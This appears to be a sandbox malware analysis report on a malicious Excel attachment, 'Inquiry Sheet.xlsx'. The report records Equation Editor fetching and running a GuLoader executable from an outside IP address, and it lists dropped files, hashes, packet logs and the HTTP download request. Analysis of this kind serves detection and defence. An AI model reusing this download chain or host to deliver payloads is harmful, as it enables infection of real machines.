                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B7.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\Desktop\~$Inquiry Sheet.xlsx
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious:true
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  C:\Users\Public\vbc.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):139264
                  Entropy (8bit):6.609176626733107
                  Encrypted:false
                  SSDEEP:1536:T8hQbCg3d/xOfo6dUoEiL7yQMLIn6Otq/CrAvI7S6mStD2arf6FRo6DomgJ:DGAZ6dNEc/MLo6Ot57S69D2aD6F5oj
                  MD5:B7E5ACDADE5630DBF1AB4B211DDC16DB
                  SHA1:EF39B9D9B31F61A538C79D06171B2F3FB62D3346
                  SHA-256:F16CD8C15E34505A4C72C77DF972264F67E97C2E0B79B205F82BB59F26C09998
                  SHA-512:61FA3478A69E18BF8024E656AB3C7334B96C94BA8A64E672596D77FE84F5E247508E13331DBE10D20488EDAEA7E0D976D8E5C1B27820AB4091F063E7833E05B9
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 18%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....kH..........................................@..........................`......\b..........................................(.... ..:;..................................................................8... ....................................text............................... ..`.data...XE..........................@....rsrc...:;... ...@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.988006994673915
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Inquiry Sheet.xlsx
                  File size:601480
                  MD5:b079763f132db9b4d979256a28909892
                  SHA1:3f8ef9821671cbc8267baa2c6e9a41a18af45f78
                  SHA256:71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
                  SHA512:cbe0ed7d4eefa62822efa8eaa389197d69a256e7966017f0edb92abd26ae0062f2113fecffa2b726d2e291907d144e8c9c93370c47be734c9a16015cfb08efb4
                  SSDEEP:12288:2nCwXTD6QrBSx+wiiHmFi1KTBOh0jOTFn6RoSFuSc:2rDZdrwHmFikFO/h6Royc
                  File Content Preview:........................>.......................................................................................z..............................................................................................................................................

                  File Icon

                  Icon Hash:e4e2aa8aa4b4bcb4

                  Network Behavior

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 13, 2021 20:16:54.802037954 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.832849979 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.833056927 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.834225893 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.899867058 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.950155973 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.950234890 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.950273991 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.950309992 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.950387955 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.950689077 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.980690956 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.980767012 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.980792046 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.980812073 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.980850935 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.980890036 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.980910063 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.980923891 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.980959892 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.980995893 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.981008053 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.981044054 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.981065989 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:54.981086016 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:54.981107950 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019262075 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019306898 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019337893 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019365072 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019382000 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019402027 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019422054 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019459963 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019467115 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019493103 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019509077 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019546032 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019551992 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019578934 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019592047 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019619942 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019629002 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019654989 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019668102 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019699097 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019705057 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019726992 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019740105 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019763947 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019774914 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019800901 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019812107 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019838095 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.019853115 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.019879103 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.022079945 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.048996925 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049079895 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049108982 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049122095 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049158096 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049197912 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049220085 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049233913 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049259901 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049293041 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049309969 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049343109 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049379110 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049413919 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049438000 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049444914 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049468994 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049504042 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049519062 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049551010 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049571037 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049603939 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049618959 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049652100 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049666882 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049698114 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049715996 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049753904 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049766064 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049798965 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049818993 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049851894 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049870968 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049904108 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049920082 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049952030 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.049968004 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.049998999 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.050017118 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.050049067 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.050065041 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22
                  Sep 13, 2021 20:16:55.050092936 CEST | 49165 | 80 | 192.168.2.22 | 212.192.246.25
                  Sep 13, 2021 20:16:55.050108910 CEST | 80 | 49165 | 212.192.246.25 | 192.168.2.22

                  HTTP Request Dependency Graph

                  • 212.192.246.25

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.22 | 49165 | 212.192.246.25 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Sep 13, 2021 20:16:54.834225893 CEST | 0 | OUT | GET /excel/vbc.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 212.192.246.25
                  Connection: Keep-Alive
                  Sep 13, 2021 20:16:54.950155973 CEST | 1 | IN | HTTP/1.1 200 OK
                  Date: Mon, 13 Sep 2021 18:16:54 GMT
                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                  Last-Modified: Sun, 12 Sep 2021 22:03:18 GMT
                  ETag: "22000-5cbd38416fb31"
                  Accept-Ranges: bytes
                  Content-Length: 139264
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6WWWKWuWqWRichWPELkH@`\b( :;8 .text `.dataXE@.rsrc:; @@@IMSVBVM60.DLL


                  Code Manipulations

                  Statistics

                  Behavior


                  System Behavior

                  General

                  Start time:20:16:19
                  Start date:13/09/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13fd80000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:20:16:41
                  Start date:13/09/2021
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:20:16:42
                  Start date:13/09/2021
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:139264 bytes
                  MD5 hash:B7E5ACDADE5630DBF1AB4B211DDC16DB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 18%, ReversingLabs
                  Reputation:low

                  Disassembly

                  Code Analysis
